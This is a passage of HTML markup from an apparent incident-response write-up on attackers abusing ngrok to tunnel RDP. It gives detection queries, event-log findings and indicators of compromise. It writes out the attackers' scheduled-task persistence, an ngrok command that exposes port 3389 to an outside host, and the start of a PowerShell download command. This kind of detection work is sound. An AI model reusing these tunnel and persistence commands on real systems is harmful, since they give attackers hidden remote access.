data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; &#8220;C:Windowssystem32ngrok.exe&#8221; tcp 3389\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variables<\/strong> &gt; <span style=\"color: #99cc00\"><strong>ngrok | tcp 3889<\/strong><\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Sophos_process_journal\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">CMDLine\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">ngrok<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">tcp 3389<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Windows Event Logs<\/strong> (Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx)\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; Source Network Address: ::%16777216\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Rapid Response: Logins.01.0 &#8211; 1149 RDP Logins\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Source IP\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">%::%16777216%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Windows Event Logs<\/strong> (Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx)\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; Source Network Address: ::%16777216\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><strong>::%16777216<\/strong><\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Rapid Response: Logins.01.2 &#8211; 21-40 local session login events\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Source IP\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">%::%16777216%<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Windows Event Logs<\/strong> (Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx)\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; The server accepted a new TCP connection from client [::1]:51154\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><strong>::1<\/strong><\/span><\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Query<\/strong> &gt; Unknown<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>New IoC discovery<\/strong>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Scheduled task located that binds a pre-defined ngrok URL via TCP protocol using port 3389\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Task name<\/strong> &gt; MicrosoftSync<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Task action<\/strong> &gt; C:WindowsTemprkngrok.exe<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Task argument<\/strong> &gt; tcp &#8211;region=us &#8211;remote-addr=3.tcp.ngrok.io:25126 3389<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Execute ngrok<\/strong> &gt; C:WindowsTemprkngrok.exe<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Protocol to use<\/strong> &gt; TCP<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Region select<\/strong> &gt; us<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Remote address<\/strong> &gt; 3.tcp.ngrok.io:25126 3389\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">URL &gt; 3.tcp.ngrok.io<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Port &gt; 25126<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">Protocol\u00a0 &gt; 3389<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Task path<\/strong> &gt; C:Windowssystem32tasksMicrosoftWindowsMicrosoftSync.xml<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Tasks.01.0 &#8211; Scheduled Tasks<\/strong>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Finding<\/strong> &gt; Scheduled task containing action argument parameters parsed to ngrok binary to start a 3389 tunnel via a predefined binding address\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><strong>Static variable<\/strong> &gt; <span style=\"color: #99cc00\"><strong>%ngrok%<\/strong><\/span>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">If a remote address was supplied within argument parameters within a scheduled task, the static part that could be searched for would be the second-level domain, which is ngrok\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">3.tcp.<span style=\"color: #99cc00\"><strong>ngrok<\/strong><\/span>.io:25126 3389\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">3 &gt; dynamic value<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">tcp &gt; static although doesn\u2019t attribute to ngrok<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">ngrok &gt; static value for second-level domain to use ngrok public services<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">io &gt; static value at present<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">25126 &gt; Dynamic \/ unknown static value (different tiering options)<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">3389 &gt; Dynamic value (other ports could be bound)<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">%<\/li>\n<\/ul>\n<\/li>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\">$$action$$\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"4\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559684&quot;:-2,&quot;335559685&quot;:1080,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" data-aria-posinset=\"1\" data-aria-level=\"2\"><span style=\"color: #99cc00\"><strong>%ngrok%<\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3><strong>Analyze<\/strong><\/h3>\n<p>The following information is based on intelligence gathered during two incident response investigations in which ngrok was introduced to the targeted network and abused by attackers.<\/p>\n<p><u>Incident One<\/u><\/p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li>RDP connections\n<ul>\n<li>Source network address: ::%16777216<\/li>\n<li>The server accepted a new TCP connection from client <span class=\"NormalTextRun ContextualSpellingAndGrammarErrorV2Themed SCXW99115198 BCX0\">[::<\/span><span class=\"NormalTextRun SCXW99115198 BCX0\">1]:52423<\/span><\/li>\n<\/ul>\n<\/li>\n<li>PowerShell downloads ngrok archive file, extracts to disk, and starts the ngrok process via PowerShell\n<ul>\n<li><span class=\"TextRun SCXW26240082 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW26240082 BCX0\">powershell.exe \/c (New-Object <\/span><\/span><span class=\"TextRun SCXW26240082 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SpellingErrorV2Themed SCXW26240082 BCX0\">System.Net.WebClient<\/span><span class=\"NormalTextRun SCXW26240082 BCX0\">).<\/span><span class=\"NormalTextRun SpellingErrorV2Themed SCXW26240082 